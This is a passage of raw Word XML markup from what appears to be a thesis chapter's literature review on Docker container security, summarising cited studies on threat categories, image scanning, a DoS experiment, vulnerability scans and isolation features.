          </w:r>
          <w:r w:rsidR="00416917">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00416917">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00416917">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E85971">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00416917">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A860D37" w14:textId="28203DEA" w:rsidR="000E0A85" w:rsidRDefault="00D64D4B" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="000E0A85">
        <w:t>Docker ecosystem involves various technologies and components</w:t>
      </w:r>
      <w:r>
        <w:t>, and therefore its security area is extensive and covers different parts and platforms.</w:t>
      </w:r>
      <w:r w:rsidR="006E631D">
        <w:t xml:space="preserve"> Some security threat can arise either from the host machine or the container. </w:t>
      </w:r>
      <w:r>
        <w:t>An extensive</w:t>
      </w:r>
      <w:r w:rsidR="005A5258">
        <w:t xml:space="preserve"> and general-purpose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> study of </w:t>
      </w:r>
      <w:r w:rsidR="00F51FE9">
        <w:t xml:space="preserve">containerisation </w:t>
      </w:r>
      <w:r>
        <w:t>security challenge and issues is p</w:t>
      </w:r>
      <w:r w:rsidR="005A5258">
        <w:t>resented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2064284084"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00CF1A1D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00CF1A1D">
            <w:instrText xml:space="preserve"> CITATION SSu19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00CF1A1D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[74]</w:t>
          </w:r>
          <w:r w:rsidR="00CF1A1D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00CF1A1D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F51FE9">
        <w:t xml:space="preserve"> This wor</w:t>
      </w:r>
      <w:r w:rsidR="005A5258">
        <w:t xml:space="preserve">k </w:t>
      </w:r>
      <w:r w:rsidR="00BF00F2">
        <w:t>classified the security requirements into four main groups based on the context of the host-container landscape.</w:t>
      </w:r>
      <w:r w:rsidR="00411EC0">
        <w:t xml:space="preserve"> According to the authors, the </w:t>
      </w:r>
      <w:r w:rsidR="006E631D">
        <w:t xml:space="preserve">security threats </w:t>
      </w:r>
      <w:r w:rsidR="00411EC0">
        <w:t>occur in four areas: inter-container, application to a container, container to host, and host to container.</w:t>
      </w:r>
      <w:r w:rsidR="00F12D9A">
        <w:t xml:space="preserve"> The first three ca</w:t>
      </w:r>
      <w:r w:rsidR="001E677A">
        <w:t xml:space="preserve">ses </w:t>
      </w:r>
      <w:r w:rsidR="00F12D9A">
        <w:t xml:space="preserve">employ Linux kernel features (namespaces and Cgroups), while the </w:t>
      </w:r>
      <w:r w:rsidR="001E677A">
        <w:t xml:space="preserve">last case utilises hardware solutions, such as a trusted platform module (TPM) and trusted platform support, to mitigate </w:t>
      </w:r>
      <w:r w:rsidR="001E677A">
        <w:lastRenderedPageBreak/>
        <w:t>such attacks on containers.</w:t>
      </w:r>
      <w:r w:rsidR="0024188D">
        <w:t xml:space="preserve"> This work </w:t>
      </w:r>
      <w:r w:rsidR="003D6072">
        <w:t>briefly covers</w:t>
      </w:r>
      <w:r w:rsidR="0024188D">
        <w:t xml:space="preserve"> the security of containers </w:t>
      </w:r>
      <w:r w:rsidR="003D6072">
        <w:t>with a wide range of credible sources</w:t>
      </w:r>
      <w:r w:rsidR="003D6072" w:rsidRPr="003D6072">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-839617577"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003D6072">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003D6072">
            <w:instrText xml:space="preserve"> CITATION SSu19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="003D6072">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[74]</w:t>
          </w:r>
          <w:r w:rsidR="003D6072">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003D6072">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F72E26" w14:textId="22F89F64" w:rsidR="00330417" w:rsidRDefault="00510400" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">The authors in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1274472480"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION SPM20 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[75]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B97DD5">
        <w:t xml:space="preserve"> investigated Docker’s security concern, particularly with public Docker images, using static and dynamic analysis approaches.</w:t>
      </w:r>
      <w:r w:rsidR="00DB730B">
        <w:t xml:space="preserve"> They</w:t>
      </w:r>
      <w:r w:rsidR="002E2E63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00896764">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00DB730B">
        <w:t xml:space="preserve">evaluated </w:t>
      </w:r>
      <w:r w:rsidR="007F72A1">
        <w:t>and compared current security tools and technologies using different metrics base</w:t>
      </w:r>
      <w:r w:rsidR="00896764">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="007F72A1">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="00896764">
        <w:t xml:space="preserve">previous works done by other researchers. </w:t>
      </w:r>
      <w:r w:rsidR="002E2E63">
        <w:t xml:space="preserve">Malicious or vulnerable images can be discovered using </w:t>
      </w:r>
      <w:r w:rsidR="00896764">
        <w:t>tools and vulnerability assessment, like common vulnerabilities and exposures (CVE).</w:t>
      </w:r>
      <w:r w:rsidR="00900955">
        <w:t xml:space="preserve"> In the paper, Docker uses Notary </w:t>
      </w:r>
      <w:r w:rsidR="005F4EB5">
        <w:t xml:space="preserve">as a de facto tool </w:t>
      </w:r>
      <w:r w:rsidR="00900955">
        <w:t>find vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="005F4EB5">
        <w:t xml:space="preserve"> and to provide secure method of publishing and verifying content over a </w:t>
      </w:r>
      <w:r w:rsidR="006B1802">
        <w:t>distributed network. Further, the authors compared static and dynamic analysis methods. Their research shows that dynamic analysis provides better security but takes more time. This work conclude</w:t>
      </w:r>
      <w:r w:rsidR="00E32151">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006B1802">
        <w:t xml:space="preserve"> that Docker images need to be monitored and scanned regularly</w:t>
      </w:r>
      <w:r w:rsidR="00E32151">
        <w:t xml:space="preserve"> to prevent malicious attacks. A major limitation of this paper is that it does not provide a practical analysis of Docker security and has less reference number</w:t>
      </w:r>
      <w:r w:rsidR="00E32151" w:rsidRPr="00E32151">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-819112451"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:instrText xml:space="preserve"> CITATION SPM20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[75]</w:t>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E32151">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008403FA">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="00E32151">
        <w:t>imilar work is also p</w:t>
      </w:r>
      <w:r w:rsidR="008403FA">
        <w:t>resented</w:t>
      </w:r>
      <w:r w:rsidR="00E32151">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1910106470"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:instrText xml:space="preserve"> CITATION KBr20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[76]</w:t>
          </w:r>
          <w:r w:rsidR="00E32151">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E32151">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D9377" w14:textId="2D529D2A" w:rsidR="008403FA" w:rsidRDefault="00664AB3" w:rsidP="00664AB3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc87032912"/>
      <w:r>
        <w:t>Docker Outside Threats</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="55640DA7" w14:textId="5CA37474" w:rsidR="00664AB3" w:rsidRDefault="004162DB" w:rsidP="00664AB3">
      <w:r>
        <w:t xml:space="preserve">The security threats of </w:t>
      </w:r>
      <w:r w:rsidR="008E2033">
        <w:t xml:space="preserve">Docker can come from anywhere because </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="008E2033">
        <w:t>involves various technologies in its surrounding.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> For this reason, it is more complex to secure </w:t>
      </w:r>
      <w:r w:rsidR="00476085">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>Docker ecosystem than other deployment technologies.</w:t>
      </w:r>
      <w:r w:rsidR="00476085">
        <w:t xml:space="preserve"> Tomar and Jeena in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1191268503"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00000557">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00000557">
            <w:instrText xml:space="preserve"> CITATION ATo20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00000557">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[77]</w:t>
          </w:r>
          <w:r w:rsidR="00000557">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00000557">
        <w:t xml:space="preserve"> experiment</w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t>ed with</w:t>
      </w:r>
      <w:r w:rsidR="00BA1FB5">
        <w:t xml:space="preserve"> Dos attack on containers</w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t xml:space="preserve"> connected to the same network</w:t>
      </w:r>
      <w:r w:rsidR="00E1117D">
        <w:t xml:space="preserve"> on Docker version 19.03.02</w:t>
      </w:r>
      <w:r w:rsidR="00BA1FB5">
        <w:t xml:space="preserve">. The authors </w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t>utilise</w:t>
      </w:r>
      <w:r w:rsidR="00BA1FB5">
        <w:t xml:space="preserve"> kali Linux tools hping3 and Nmap to carry out the attack</w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t xml:space="preserve"> by inundating</w:t>
      </w:r>
      <w:r w:rsidR="00ED62A6">
        <w:t xml:space="preserve"> packets to the</w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t xml:space="preserve"> target </w:t>
      </w:r>
      <w:r w:rsidR="00ED62A6">
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidR="00B6116D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E01C4">
        <w:t xml:space="preserve"> Further, they </w:t>
      </w:r>
      <w:r w:rsidR="005544E3">
        <w:t xml:space="preserve">proposed a layered approach to group the various attack </w:t>
      </w:r>
      <w:r w:rsidR="004A52C4">
        <w:t xml:space="preserve">scenarios </w:t>
      </w:r>
      <w:r w:rsidR="00DA02AB">
        <w:t>within</w:t>
      </w:r>
      <w:r w:rsidR="005544E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A52C4">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005544E3">
        <w:t>Docker eco</w:t>
      </w:r>
      <w:r w:rsidR="004A52C4">
        <w:t>sphere (container, host, application, and Docker engine). They also provide a detailed description and classification of all possible attacks on each layer, as seen in figure</w:t>
      </w:r>
      <w:r w:rsidR="00DA02AB">
        <w:t xml:space="preserve"> 6.</w:t>
      </w:r>
      <w:r w:rsidR="00B71B27">
        <w:t xml:space="preserve"> This article presented and described the possible attacks in meticulous detail, though it covers fewer reference numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0C8415" w14:textId="54EBE9FC" w:rsidR="00DA02AB" w:rsidRDefault="00DA02AB" w:rsidP="00DA02AB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B58ED68" wp14:editId="7C9AAD01">
            <wp:extent cx="2914650" cy="3238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14650" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C54AA" w14:textId="0DAF2FAE" w:rsidR="00DA02AB" w:rsidRDefault="00DA02AB" w:rsidP="00DA02AB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc86858597"/>
      <w:bookmarkStart w:id="70" w:name="_Toc86867487"/>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Docker attacks classification </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1364794182"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00DA02AB">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00DA02AB">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION ATo20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00DA02AB">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[77]</w:t>
          </w:r>
          <w:r w:rsidRPr="00DA02AB">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00DA02AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="47CA1EA5" w14:textId="021C4504" w:rsidR="00E1117D" w:rsidRDefault="00851320" w:rsidP="00E1117D">
      <w:r>
        <w:t>The researchers i</w:t>
      </w:r>
      <w:r w:rsidR="00E1117D">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-558942383"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003A2AB2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003A2AB2">
            <w:instrText xml:space="preserve"> CITATION AAM16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="003A2AB2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[78]</w:t>
          </w:r>
          <w:r w:rsidR="003A2AB2">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> performed a comparative</w:t>
      </w:r>
      <w:r w:rsidR="003A2AB2">
        <w:t xml:space="preserve"> experiment with attacks to evaluate the security of Docker containers.</w:t>
      </w:r>
      <w:r w:rsidR="00076C37">
        <w:t xml:space="preserve"> They compare</w:t>
      </w:r>
      <w:r w:rsidR="00130CC2">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00076C37">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00130CC2">
        <w:t>attack surface</w:t>
      </w:r>
      <w:r w:rsidR="00076C37">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00AA08D5">
        <w:t>running a service in a container against a service running in a typical host machine.</w:t>
      </w:r>
      <w:r w:rsidR="00130CC2">
        <w:t xml:space="preserve"> They installed Apache, MySQL, and Nginx on a Debian host</w:t>
      </w:r>
      <w:r w:rsidR="002C3C7E">
        <w:t>. Simultaneously the authors created three different containers from Docker hub</w:t>
      </w:r>
      <w:r w:rsidR="0084287C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002C3C7E">
        <w:t xml:space="preserve"> one for each service.</w:t>
      </w:r>
      <w:r w:rsidR="0084287C">
        <w:t xml:space="preserve"> To run the experiment, they run Nessus scanner locally to detect the vulnerabilities on each side. Their findings indicate that containers </w:t>
      </w:r>
      <w:r w:rsidR="00971F44">
        <w:t>expose to more vulnerabilities compared to VM or typical hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2005814092"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION AAM16 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[78]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00971F44">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0084287C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256F4FC" w14:textId="3A3015DC" w:rsidR="003A0683" w:rsidRDefault="003A0683" w:rsidP="003A0683">
      <w:r>
        <w:t xml:space="preserve">The vulnerability analysis of Docker ecosphere </w:t>
      </w:r>
      <w:r w:rsidR="000F25EE">
        <w:t>comprises</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> four main areas: isolation</w:t>
      </w:r>
      <w:r w:rsidR="000F25EE">
        <w:t xml:space="preserve"> of file system within a container</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, host resource management, network, and process isolation, according to the study in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-998188407"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION JWe20 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[79]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="000F25EE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FD7639" w:rsidRPr="00FD7639">
        <w:t>The authors emphasise that providing more splendid isolation of files system</w:t>
      </w:r>
      <w:r w:rsidR="005D7784">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FD7639" w:rsidRPr="00FD7639">
        <w:t xml:space="preserve"> and processes running inside a container increases the security of Docker significantly.</w:t>
      </w:r>
      <w:r w:rsidR="005D7784">
        <w:t xml:space="preserve"> In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00040AEC">
        <w:t>resources management using Cgroups helps to reduce the potential vulnerability threats</w:t>
      </w:r>
      <w:r w:rsidR="00652F04">
        <w:t xml:space="preserve"> significantly</w:t>
      </w:r>
      <w:r w:rsidR="00040AEC">
        <w:t xml:space="preserve"> in Docker. Further, the authors briefly </w:t>
      </w:r>
      <w:r w:rsidR="009F65E0">
        <w:t>introduce the concept of various Linux capabilities features, including AppArmor, Seccomp and mandatory access control (MAC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22324767" w14:textId="4C9BED16" w:rsidR="009F65E0" w:rsidRDefault="009F65E0" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc87032913"/>
      <w:r>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="14E331A6" w14:textId="17D48614" w:rsidR="001C4FDA" w:rsidRDefault="001C4FDA" w:rsidP="001C4FDA">
      <w:r>
        <w:t xml:space="preserve">In summary, this chapter provided a detailed literature review of </w:t>
      </w:r>
      <w:r w:rsidR="0047796D">
        <w:t>current Docker security</w:t>
      </w:r>
      <w:r w:rsidR="0029212C">
        <w:t xml:space="preserve">, focusing on previous related and relevant works to the subject and the development of the </w:t>
      </w:r>
      <w:r w:rsidR="0029212C">
        <w:lastRenderedPageBreak/>
        <w:t>overall design of this project.</w:t>
      </w:r>
      <w:r w:rsidR="001036D9">
        <w:t xml:space="preserve"> Based on those works, the au</w:t>
      </w:r>
      <w:r w:rsidR="00652F04">
        <w:t xml:space="preserve">thor </w:t>
      </w:r>
      <w:r w:rsidR="001036D9">
        <w:t xml:space="preserve">concluded that privilege escalation and image misconfiguration are the </w:t>
      </w:r>
      <w:r w:rsidR="00652F04">
        <w:t>primary</w:t>
      </w:r>
      <w:r w:rsidR="001036D9">
        <w:t xml:space="preserve"> security concern within Docker systems.</w:t>
      </w:r>
      <w:r w:rsidR="00DC46CD">
        <w:t xml:space="preserve"> The author has also realised that Docker involves multiple technologies, making it more complex to secure.</w:t>
      </w:r>
      <w:r w:rsidR="00345EB6">
        <w:t xml:space="preserve"> As a result, it is more susceptible to multiple security attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00A21FE0">
        <w:t xml:space="preserve"> In a nutshell, Docker is a new technology, and thus its security has not been tested adequately and requires much work to its improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F285966" w14:textId="20367C3A" w:rsidR="00E70015" w:rsidRDefault="00E70015" w:rsidP="001C4FDA">
      <w:r>
        <w:t>The next chapter will discuss the methodologies and strategies used to develop the project’s aims and objectives.</w:t>
